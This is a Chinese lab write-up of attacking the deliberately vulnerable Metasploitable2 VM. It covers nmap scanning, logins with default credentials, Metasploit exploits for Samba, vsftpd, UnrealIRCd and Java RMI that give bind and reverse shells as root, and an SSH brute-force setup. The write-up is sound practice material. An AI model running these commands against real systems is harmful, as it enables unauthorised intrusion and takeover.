*Metasploitable2靶机渗透*
*Metasploitable2介绍*
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。
*进行此次靶机练习的原因*
其中存在的的诸多漏洞中,年代也是比较久远的,尽行这个实验的目的就是通过自己搭建的靶机环境熟练渗透测试的方法和流程,巩固自己的渗透思路。因此,在这次实验中会针对一个问题进行多工具多手段的操作,这并不是画蛇添足,因为每个工具每种方法都有它的长处与弊端,不要过于依赖某个工具,这会使你在今后真正的渗透测试中更加的自信。
*环境的配置*
攻击机: kali linux ip:192.168.22.137 (ip根据个人电脑配置)
靶机 :Metasploitable2 靶机ip:192.168.22.134 (ip根据个人电脑配置) 默认账号/密码msfadmin/msfadmin
注:Metasploitable2默认开机为普通用户,不能修改IP地址。需要登录root后才可以修改IP
root用户及网络设置流程:
1、普通用户登录成功后,在命令行输入sudo passwd 2、输入两次root密码,出现successful字样即可 3、命令行输入su - root 切换到root用户 4、编辑网卡设置vim /etc/network/interface
vim /etc/network/interface
#This file describes the......
#.....
#The primary nerwork interface
auto eth0
iface eth0 inet dhcp 本人采用的自动获取IP
#iface eth0 inet static
#address 192.168. ....
#netmask 255.255.255.0
#gateway 192.168. ....
根据实际需要选择动态或静态网络
5、重启网络 /etc/init.d/networking restart
下载链接::https://pan.baidu.com/s/1IRYfp-d_qQ9kfcsdK5PNWw
提取码:rox3 ,解压后可直接使用
实验
使用nmap进行信息收集
┌──(root💀kali)-[~]
└─# nmap -T4 -A -v 192.168.22.134
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-05 18:08 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating ARP Ping Scan at 18:08
Scanning 192.168.22.134 [1 port]
Completed ARP Ping Scan at 18:08, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:08
Completed Parallel DNS resolution of 1 host. at 18:08, 0.03s elapsed
Initiating SYN Stealth Scan at 18:08
Scanning 192.168.22.134 [1000 ports]
Discovered open port 25/tcp on 192.168.22.134
Discovered open port 139/tcp on 192.168.22.134
Discovered open port 80/tcp on 192.168.22.134
Discovered open port 5900/tcp on 192.168.22.134
Discovered open port 21/tcp on 192.168.22.134
Discovered open port 22/tcp on 192.168.22.134
Discovered open port 3306/tcp on 192.168.22.134
Discovered open port 23/tcp on 192.168.22.134
Discovered open port 111/tcp on 192.168.22.134
Discovered open port 53/tcp on 192.168.22.134
Discovered open port 445/tcp on 192.168.22.134
Discovered open port 6667/tcp on 192.168.22.134
Discovered open port 1099/tcp on 192.168.22.134
Discovered open port 8180/tcp on 192.168.22.134
Discovered open port 2049/tcp on 192.168.22.134
Discovered open port 2121/tcp on 192.168.22.134
Discovered open port 5432/tcp on 192.168.22.134
Discovered open port 513/tcp on 192.168.22.134
Discovered open port 514/tcp on 192.168.22.134
Discovered open port 8009/tcp on 192.168.22.134
Discovered open port 6000/tcp on 192.168.22.134
Discovered open port 512/tcp on 192.168.22.134
Discovered open port 1524/tcp on 192.168.22.134
Completed SYN Stealth Scan at 18:08, 0.14s elapsed (1000 total ports)
Initiating Service scan at 18:08
Scanning 23 services on 192.168.22.134
Completed Service scan at 18:08, 11.05s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 192.168.22.134
NSE: Script scanning 192.168.22.134.
Initiating NSE at 18:08
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 18:08, 9.80s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.51s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Nmap scan report for 192.168.22.134
Host is up (0.00092s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.22.137
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2021-02-05T10:08:57+00:00; +14s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 40160/udp mountd
| 100005 1,2,3 44798/tcp mountd
| 100021 1,3,4 33803/udp nlockmgr
| 100021 1,3,4 40110/tcp nlockmgr
| 100024 1 39847/udp status
|_ 100024 1 53367/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 18
| Capabilities flags: 43564
| Some Capabilities: LongColumnFlag, Speaks41ProtocolNew, SupportsTransactions, SwitchToSSLAfterHandshake, Support41Auth, ConnectWithDatabase, SupportsCompression
| Status: Autocommit
|_ Salt: XE3nQ-*).Lry-pnYRmN|
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2021-02-05T10:08:57+00:00; +15s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 3:59:11
| source ident: nmap
| source host: 82B328E6.3BA08CB1.FFFA6D49.IP
|_ error: Closing Link: livdnmifj[192.168.22.137] (Quit: livdnmifj)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:DD:32:05 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.163 days (since Fri Feb 5 14:13:30 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=208 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h15m14s, deviation: 2h30m00s, median: 13s
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2021-02-05T05:08:48-05:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.92 ms 192.168.22.134
NSE: Script Post-scanning.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.98 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)
弱口令漏洞
原理:系统或者数据库的登陆用户,密码简单或者用户名相同,容易通过暴力破解的手段来获取密 码。
影响范围:所有使用用户名/密码登陆的系统和软件都有可能存在此问题
1、系统弱口令漏洞——22端口开放(22端口:SSH远程登录协议)
在kali中输入telnet 192.168.22.134 login/password:msfadmin/msfadmin
此实验需要事前安装telnet,安装步骤如下
┌──(root💀kali)-[~]
└─# apt-get install telnetd
正在读取软件包列表... 完成
正在分析软件包的依赖关系树
正在读取状态信息... 完成
下列【新】软件包将被安装:
telnetd
升级了 0 个软件包,新安装了 1 个软件包,要卸载 0 个软件包,有 1257 个软件包未被升级。
需要下载 44.9 kB 的归档。
......
......
┌──(root💀kali)-[~]
└─# apt-get install xinetd 100 ⨯
正在读取软件包列表... 完成
正在分析软件包的依赖关系树
正在读取状态信息... 完成
下列软件包是自动安装的并且现在不需要了:
tcpd
使用'apt autoremove'来卸载它(它们)。
下列软件包将被【卸载】:
inetutils-inetd
下列【新】软件包将被安装:
......
......
┌──(root💀kali)-[~]
└─# vim /etc/inetd.conf
...
#daytime stream tcp6 nowait root internal
#time stream tcp6 nowait root internal
#:STANDARD: These are standard services.
安装完毕后,系统会在/etc/inetd.conf加上这行信息,如果没有手动添加
telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd
#:BSD: Shell, login, exec and talk are BSD protocols.
...
┌──(root💀kali)-[~]
└─# vim /etc/xinetd.d/telnet 系统中并没有这个文件,编辑自动生成即可
# default: on
# description: The telnet server serves telnet sessions; it uses /
# unencrypted username/password pairs for authentication.
service telnet
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/sbin/in.telnetd
server_args = -h
log_on_failure += USERID
}
┌root💀kali)-[~]
└─# /etc/init.d/xinetd restart
Restarting xinetd (via systemctl): xinetd.service.
┌──(root💀kali)-[~]
└─# apt-get install telnet
正在读取软件包列表... 完成
正在分析软件包的依赖关系树
正在读取状态信息... 完成
下列软件包是自动安装的并
...
...
安装完成,可以进行实验了
┌──(root💀kali)-[~]
└─# telnet 192.168.22.134
Trying 192.168.22.134...
Connected to 192.168.22.134.
Escape character is '^]'.
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|
Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password:
Last login: Fri Feb 5 01:39:28 EST 2021 from 192.168.22.129 on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ pwd
/home/msfadmin
成功登录远程靶机
2、MySQL弱密码登录——3306端口开放(3306端口:MySQL开放此端口)
┌──(root💀kali)-[~]
└─# mysql -h 192.168.22.134
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 26
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases
-> ;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.001 sec)
MySQL [(none)]>
成功登录对方MySQL数据库
3、PostgreSQL弱密码登录——端口5432开放(5432端口:PostgreSQL数据库)
┌──(root💀kali)-[~]
└─# psql -h 192.168.22.134 -U postgres 2 ⨯
用户 postgres 的口令:postgres
psql (13.0 (Debian 13.0-4), 服务器 8.3.1)
输入 "help" 来获取帮助信息.
postgres=#
使用\q 退出.
postgres-# \q
成功登录对方PostgreSQL数据库
4、VNC弱密码登录——端口5900开放(5900端口:虚拟网络计算机显示0;5901–1;5902–2;5903–3)
┌──(root💀kali)-[~]
└─# vncviewer 192.168.22.134
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 密码为password
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
32 bits per pixel.
...
...
postgres=#
使用\q 退出.
postgres-# \q
成功登录对方PostgreSQL数据库
4、VNC弱密码登录——端口5900开放(5900端口:虚拟网络计算机显示0;5901–1;5902–2;5903–3)
┌──(root💀kali)-[~]
└─# vncviewer 192.168.22.134
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 密码为password
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
32 bits per pixel.
...
...
5、FTP弱口令登录
使用kali自带的爆破工具(hydra)进行爆破一下
6、Samba MS-RPC Shell命令注入漏洞
漏洞产生原因:传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
影响的系统/软件:
Xerox WorkCentre Pro
Xerox WorkCentre
VMWare ESX Server
Turbolinux Server/Personal/Multimedia/Home/Desktop/Appliance/FUJI
Trustix Secure Linux
SUSE Linux Enterprise
Sun Solaris
Slackware Linux
RedHat Enterprise
Mandriva Linux
启动Metasploit
┌──(root💀kali)-[~]
└─# msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.0.15-dev ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Use the edit command to open the currently active module in your editor
搜索有关samba漏洞的代码库 search samba
msf6 > search samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
...
...
12 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
13 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
14 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
...
...
使用usermap_script代码 use exploit/multi/samba/usermap_script
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
查看攻击载荷 show payloads 并选择bind_netcat即使用netcat工具在渗透攻击成功后执行shell并通过netcat绑定在一个监听端口上
msf6 exploit(multi/samba/usermap_script) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
3 cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
4 cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
5 cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
6 cmd/unix/bind_netcat_gaping
...
...
msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
查看参数配置 show options 设置目标ip、port等参数 set RHOST 192.168.22.134
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/bind_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > set rhost 192.168.22.134
rhost => 192.168.22.134
执行exploit/run获得shell
msf6 exploit(multi/samba/usermap_script) > run
[*] Started bind TCP handler against 192.168.22.134:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.22.134:4444) at 2021-02-06 11:50:12 +0800
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
......
7、Vsftpd源码包含后门漏洞——开放着21端口,并且vsftpd版本号为2.3.4
原理: 在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码
影响软件:Vsftpd server v2.3.4
启动Metsploit 搜索关于Vsftpd的了漏洞代码库 search vsftpd
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
使用代码 use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
查看需要设置的参数 show options 设置个目标IP即可, set RHOST 192.168.22.134
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.22.134:21 - The port used by the backdoor bind listener is already open
[+] 192.168.22.134:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (0.0.0.0:0 -> 192.168.22.134:6200) at 2021-02-06 12:09:20 +0800
whoami
root
成功拿下对方shell
8、UnreallRCd后门漏洞
原理: 在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。
影响系统/软件:Unreal UnreallRCd3.2.8.1
在终端中输入命令“search unreal ircd”,搜索ircd的相关工具和攻击载荷。
msf6 > search unreal ircd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
在终端中输入命令“use exploit/unix/irc/unre ircd 3281backdoor”,启用漏洞利用模块。
msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
在终端中输入命令“show options",查看需要设置的相关项,“yes” 表示必须填写的参数。
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
接下来在终端中输入命令“set RHOST 【靶机ip】”,设置目标主机的IP地址
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[-] 192.168.22.134:6667 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
此处提示没有选择payload,手动设置payload
设置payload及lhost(攻击端IP)
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 192.168.22.137
lhost => 192.168.22.137
执行攻击exploit/run
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP handler on 192.168.22.137:4444
[*] 192.168.22.134:6667 - Connected to 192.168.22.134:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.22.134:6667 - Sending backdoor command...
[*] Command shell session 1 opened (192.168.22.137:4444 -> 192.168.22.134:59370) at 2021-02-06 12:32:48 +0800
whoami
root
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:dd:32:05
inet addr:192.168.22.134 Bcast:192.168.22.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fedd:3205/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500
......
9、Java RMI SERVER命令执行漏洞——1099端口开放
启动metasploit 在终端中输入命令“search java_rmi_server”,搜索RMI的相关工具和攻击载荷。
msf6 > search java_rmi_server
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/misc/java_rmi_server 2011-10-15 normal No Java RMI Server Insecure Endpoint Code Execution Scanner
1 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/misc/java_rmi_server
在终端中输入命令“use exploit/multi/misc/java_rmi_server”,启用漏洞利用模块, 提示符就会提示进入到该路径下。
msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。
msf6 exploit(multi/misc/java_rmi_server) > show options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.22.137 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
在终端中输入命令“set RHOST 192.168.22.134”,设置目标主机的IP地址。
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
在终端中输入“exploit”, 实施攻击,攻击成功后,建立连接会话。
msf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.22.137:4444
[*] 192.168.22.134:1099 - Using URL: http://0.0.0.0:8080/hwZJA66Q
[*] 192.168.22.134:1099 - Local IP: http://192.168.22.137:8080/hwZJA66Q
[*] 192.168.22.134:1099 - Server started.
[*] 192.168.22.134:1099 - Sending RMI Header...
[*] 192.168.22.134:1099 - Sending RMI Call...
[*] 192.168.22.134:1099 - Replied to request for payload JAR
[*] Sending stage (58125 bytes) to 192.168.22.134
[*] Meterpreter session 2 opened (192.168.22.137:4444 -> 192.168.22.134:50234) at 2021-02-06 12:55:37 +0800
[*] 192.168.22.134:1099 - Server stopped.
meterpreter > ls
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40666/rw-rw-rw- 4096 dir 2012-05-14 11:35:33 +0800 bin
40666/rw-rw-rw- 1024 dir 2012-05-14 11:36:28 +0800 boot
......
meterpreter > ifconfig
Interface 1
============
Name : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
Interface 2
============
Name : eth0 - eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.22.134
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fedd:3205
IPv6 Netmask : ::
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.22.134 - Meterpreter session 2 closed. Reason: User exit
10、Tomcat 管理台默认口令漏洞——开放8180端口并且运行着ApacheTomcat/CoyoteJSP engine1.1
原理: Tomcat管理台安装好后需要及时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell。
影响系统/软件:Tomcat
1、访问192.168.22.134:8180,选择Tomcat Manager
2、后面需要上传木马拿webshell,俺还不会用,等研究会了再继续
11、Root用户弱口令漏洞(SSH爆破)——开启着22端口ssh服务
启动MSF终端,在终端中输入命令“search ssh_login”,搜索ssh_login的相关工具和攻击载荷。
msf6 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
在终端中输入命令“use auxiliary/scanner/ssh/ssh_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下。
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) >
在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
在终端中输入命令“set RHOST 192.168.22.134”,设置目标主机的IP地址。
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
在终端中输入“set USERNAME root”,指定登陆用户名root。
msf6 auxiliary(scanner/ssh/ssh_login) > set username root
username => root
在终端中输入“set PASS_FILE ”,设置暴力破解的密码文件路径。
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file root_userpass.txt
pass_file => root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file root_userpass.txt
userpass_file => root_userpass.txt
在终端中输入“set THREADS 50”,设置暴力破解的线程数为50。
msf6 auxiliary(scanner/ssh/ssh_login) > set threads 50
threads => 50
